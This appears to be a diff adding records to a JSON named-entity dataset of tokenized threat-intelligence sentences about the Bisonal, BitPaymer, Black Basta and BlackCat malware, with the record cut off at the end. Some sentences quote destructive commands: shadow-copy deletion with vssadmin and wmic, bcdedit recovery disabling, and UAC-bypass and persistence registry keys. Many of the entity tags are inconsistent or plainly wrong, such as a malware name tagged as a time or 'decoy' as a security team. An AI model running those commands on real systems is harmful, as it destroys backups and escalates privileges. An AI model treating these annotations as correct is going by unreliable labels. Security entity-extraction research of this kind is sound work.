+ { + "tokens": [ + "Bisonal's", + "DLL", + "file", + "and", + "non-malicious", + "decoy", + "file", + "are", + "encrypted", + "with", + "RC4", + "and", + "some", + "function", + "name", + "strings", + "are", + "obfuscated." + ], + "ner_tags": [ + "B-Idus", + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "added", + "the", + "exfiltrated", + "data", + "to", + "the", + "URL", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "will", + "delete", + "its", + "dropper", + "and", + "VBS", + "scripts", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "can", + "retrieve", + "a", + "file", + "listing", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "the", + "capability", + "to", + "download", + "files", + "to", + "execute", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "relied", + "on", + "users", + "to", + "execute", + "malicious", + "file", + "attachments", + "delivered", + "via", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "dropped", + "a", + "decoy", + "payload", + "with", + "a", + ".jpg", + "extension", + "that", + "contained", + "a", + "malicious", + "Visual", + "Basic", + "script." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "renamed", + "malicious", + "code", + "to", + "`msacm32.dll`", + "to", + "hide", + "within", + "a", + "legitimate", + "library;", + "earlier", + "versions", + "were", + "disguised", + "as", + "`winhelp`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "deleted", + "Registry", + "keys", + "to", + "clean", + "up", + "its", + "prior", + "activity." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "used", + "the", + "Windows", + "API", + "to", + "communicate", + "with", + "the", + "Service", + "Control", + "Manager", + "to", + "execute", + "a", + "thread." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "used", + "raw", + "sockets", + "for", + "network", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "can", + "obtain", + "a", + "list", + "of", + "running", + "processes", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "supported", + "use", + "of", + "a", + "proxy", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "used", + "the", + "RegQueryValueExA", + "function", + "to", + "retrieve", + "proxy", + "information", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "added", + "itself", + "to", + "the", + "Registry", + "key", + "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\CurrentVersion\\Run\\</code>", + "for", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "used", + "rundll32.exe", + "to", + "execute", + "as", + "part", + "of", + "the", + "Registry", + "Run", + "key", + "it", + "adds:", + "<code>HKEY_CURRENT_USER", + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\”vert”", + "=", + "“rundll32.exe", + "c:\\windows\\temp\\pvcu.dll", + ",", + "Qszdez”</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "used", + "the", + "MPRESS", + "packer", + "and", + "similar", + "tools", + "for", + "obfuscation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "been", + "delivered", + "as", + "malicious", + "email", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "encoded", + "binary", + "data", + "with", + "Base64", + "and", + "ASCII." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "variants", + "reported", + "on", + "in", + "2014", + "and", + "2015", + "used", + "a", + "simple", + "XOR", + "cipher", + "for", + "C2.", + "Some", + "Bisonal", + "samples", + "encrypt", + "C2", + "communications", + "with", + "RC4." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "used", + "commands", + "and", + "API", + "calls", + "to", + "gather", + "system", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "can", + "execute", + "<code>ipconfig</code>", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "can", + "check", + "the", + "system", + "time", + "set", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "checked", + "if", + "the", + "malware", + "is", + "running", + "in", + "a", + "virtual", + "environment", + "with", + "the", + "anti-debug", + "function", + "GetTickCount()", + "to", + "compare", + "the", + "timing." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "can", + "check", + "to", + "determine", + "if", + "the", + "compromised", + "system", + "is", + "running", + "on", + "VMware." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal's", + "dropper", + "creates", + "VBS", + "scripts", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-SamFile", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "launched", + "cmd.exe", + "and", + "used", + "the", + "ShellExecuteW()", + "API", + "function", + "to", + "execute", + "commands", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bisonal", + "has", + "been", + "modified", + "to", + "be", + "used", + "as", + "a", + "Windows", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Features" + ] + }, + { + "tokens": [ + "BitPaymer", + "can", + "suppress", + "UAC", + "prompts", + "by", + "setting", + "the", + "<code>HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command</code>", + "registry", + "key", + "on", + "Windows", + "10", + "or", + "<code>HKCU\\Software\\Classes\\mscfile\\shell\\open\\command</code>", + "on", + "Windows", + "7", + "and", + "launching", + "the", + "<code>eventvwr.msc</code>", + "process,", + "which", + "launches", + "BitPaymer", + "with", + "elevated", + "privileges." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "can", + "import", + "a", + "hard-coded", + "RSA", + "1024-bit", + "public", + "key,", + "generate", + "a", + "128-bit", + "RC4", + "key", + "for", + "each", + "file,", + "and", + "encrypt", + "the", + "file", + "in", + "place,", + "appending", + "<code>.locked</code>", + "to", + "the", + "filename." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "has", + "used", + "RC4-encrypted", + "strings", + "and", + "string", + "hashes", + "to", + "avoid", + "identifiable", + "strings", + "within", + "the", + "binary." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "compares", + "file", + "names", + "and", + "paths", + "to", + "a", + "list", + "of", + "excluded", + "names", + "and", + "directory", + "names", + "during", + "encryption." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "attempts", + "to", + "remove", + "the", + "backup", + "shadow", + "files", + "from", + "the", + "host", + "using", + "<code>vssadmin.exe", + "Delete", + "Shadows", + "/All", + "/Quiet</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "can", + "enumerate", + "the", + "sessions", + "for", + "each", + "user", + "logged", + "onto", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "can", + "set", + "values", + "in", + "the", + "Registry", + "to", + "help", + "in", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "has", + "copied", + "itself", + "to", + "the", + "<code>:bin</code>", + "alternate", + "data", + "stream", + "of", + "a", + "newly", + "created", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "has", + "used", + "dynamic", + "API", + "resolution", + "to", + "avoid", + "identifiable", + "strings", + "within", + "the", + "binary,", + "including", + "<code>RegEnumKeyW</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "can", + "search", + "for", + "network", + "shares", + "on", + "the", + "domain", + "or", + "workgroup", + "using", + "<code>net", + "view", + "<host></code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "can", + "use", + "the", + "RegEnumKeyW", + "to", + "iterate", + "through", + "Registry", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "has", + "set", + "the", + "run", + "key", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "can", + "use", + "<code>net", + "view</code>", + "to", + "discover", + "remote", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "BitPaymer", + "can", + "enumerate", + "existing", + "Windows", + "services", + "on", + "the", + "host", + "that", + "are", + "configured", + "to", + "run", + "as", + "LocalSystem." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "can", + "modify", + "the", + "timestamp", + "of", + "an", + "executable", + "so", + "that", + "it", + "can", + "be", + "identified", + "and", + "restored", + "by", + "the", + "decryption", + "tool." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "can", + "use", + "the", + "tokens", + "of", + "users", + "to", + "create", + "processes", + "on", + "infected", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "can", + "use", + "<code>icacls", + "/reset</code>", + "and", + "<code>takeown", + "/F</code>", + "to", + "reset", + "a", + "targeted", + "executable's", + "permissions", + "and", + "then", + "take", + "ownership." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BitPaymer", + "has", + "attempted", + "to", + "install", + "itself", + "as", + "a", + "service", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "had", + "added", + "data", + "prior", + "to", + "the", + "Portable", + "Executable", + "(PE)", + "header", + "to", + "prevent", + "automatic", + "scanners", + "from", + "identifying", + "the", + "payload." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Black", + "Basta", + "dropper", + "has", + "been", + "digitally", + "signed", + "with", + "a", + "certificate", + "issued", + "by", + "Akeo", + "Consulting", + "for", + "legitimate", + "executables", + "used", + "for", + "creating", + "bootable", + "USB", + "drives." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "can", + "encrypt", + "files", + "with", + "the", + "ChaCha20", + "cypher", + "and", + "using", + "a", + "multithreaded", + "process", + "to", + "increase", + "speed." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Features", + "I-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Black", + "Basta", + "dropper", + "can", + "check", + "system", + "flags,", + "CPU", + "registers,", + "CPU", + "instructions,", + "process", + "timing,", + "system", + "libraries,", + "and", + "APIs", + "to", + "determine", + "if", + "a", + "debugger", + "is", + "present." + ], + "ner_tags": [ + "O", + "I-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O", + "I-Features", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "can", + "enumerate", + "specific", + "files", + "for", + "encryption." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "can", + "delete", + "shadow", + "copies", + "using", + "vssadmin.exe." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "has", + "set", + "the", + "desktop", + "wallpaper", + "on", + "victims'", + "machines", + "to", + "display", + "a", + "ransom", + "note." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Black", + "Basta", + "binary", + "can", + "use", + "`chmod`", + "to", + "gain", + "full", + "permissions", + "to", + "targeted", + "files." + ], + "ner_tags": [ + "O", + "I-SamFile", + "B-SecTeam", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "has", + "been", + "downloaded", + "and", + "executed", + "from", + "malicious", + "Excel", + "files." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "has", + "established", + "persistence", + "by", + "creating", + "a", + "new", + "service", + "named", + "`FAX`", + "after", + "deleting", + "the", + "legitimate", + "service", + "by", + "the", + "same", + "name." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Black", + "Basta", + "dropper", + "has", + "mimicked", + "an", + "application", + "for", + "creating", + "USB", + "bootable", + "drivers." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "can", + "modify", + "the", + "Registry", + "to", + "enable", + "itself", + "to", + "run", + "in", + "safe", + "mode", + "and", + "to", + "modify", + "the", + "icons", + "and", + "file", + "extensions", + "for", + "encrypted", + "files." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "has", + "the", + "ability", + "to", + "use", + "native", + "APIs", + "for", + "numerous", + "functions", + "including", + "discovery", + "and", + "defense", + "evasion." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "has", + "used", + "PowerShell", + "scripts", + "for", + "discovery", + "and", + "to", + "execute", + "files", + "over", + "the", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "can", + "use", + "LDAP", + "queries", + "to", + "connect", + "to", + "AD", + "and", + "iterate", + "over", + "connected", + "workstations." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "can", + "reboot", + "victim", + "machines", + "in", + "safe", + "mode", + "with", + "networking", + "via", + "`bcdedit", + "/set", + "safeboot", + "network`." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "can", + "check", + "system", + "flags", + "and", + "libraries,", + "process", + "timing,", + "and", + "API's", + "to", + "detect", + "code", + "emulation", + "or", + "sandboxing." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "can", + "enumerate", + "volumes", + "and", + "collect", + "system", + "boot", + "configuration", + "and", + "CPU", + "information." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "B-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "can", + "check", + "whether", + "the", + "service", + "name", + "FAX", + "is", + "present." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "can", + "make", + "a", + "random", + "number", + "of", + "calls", + "to", + "the", + "`kernel32.beep`", + "function", + "to", + "hinder", + "log", + "analysis." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "can", + "use", + "`cmd.exe`", + "to", + "enable", + "shadow", + "copy", + "deletion." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "has", + "used", + "WMI", + "to", + "execute", + "files", + "over", + "the", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Black", + "Basta", + "can", + "create", + "a", + "new", + "service", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "has", + "the", + "ability", + "modify", + "access", + "tokens." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "bypass", + "UAC", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "clear", + "Windows", + "event", + "logs", + "using", + "`wevtutil.exe`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "BlackCat", + "has", + "the", + "ability", + "to", + "encrypt", + "Windows", + "devices,", + "Linux", + "devices,", + "and", + "VMWare", + "instances." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "B-Tool", + "B-Features", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "has", + "the", + "ability", + "to", + "wipe", + "VM", + "snapshots", + "on", + "compromised", + "networks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "utilize", + "`net", + "use`", + "commands", + "to", + "identify", + "domain", + "users." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "determine", + "if", + "a", + "user", + "on", + "a", + "compromised", + "host", + "has", + "domain", + "admin", + "privileges." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "enumerate", + "files", + "for", + "encryption." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "delete", + "shadow", + "copies", + "using", + "`vssadmin.exe", + "delete", + "shadows", + "/all", + "/quiet`", + "and", + "`wmic.exe", + "Shadowcopy", + "Delete`;", + "it", + "can", + "also", + "modify", + "the", + "boot", + "loader", + "using", + "`bcdedit", + "/set", + "{default}", + "recoveryenabled", + "No`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "change", + "the", + "desktop", + "wallpaper", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "replicate", + "itself", + "across", + "connected", + "servers", + "via", + "`psexec`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BlackCat", + "has", + "the", + "ability", + "to", + "add", + "the", + "following", + "registry", + "key", + "on", + "compromised", + "networks", + "to", + "maintain", + "persistence:", + "`HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services", + "\\LanmanServer\\Paramenters`" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "has", + "the", + "ability", + "to", + "discover", + "network", + "shares", + "on", + "compromised", + "networks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "broadcasts", + "NetBIOS", + "Name", + "Service", + "(NBNC)", + "messages", + "to", + "search", + "for", + "servers", + "connected", + "to", + "compromised", + "networks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "has", + "the", + "ability", + "to", + "stop", + "VM", + "services", + "on", + "compromised", + "networks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "obtain", + "the", + "computer", + "name", + "and", + "UUID,", + "and", + "enumerate", + "local", + "drives." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "utilize", + "`net", + "use`", + "commands", + "to", + "discover", + "the", + "user", + "name", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "execute", + "commands", + 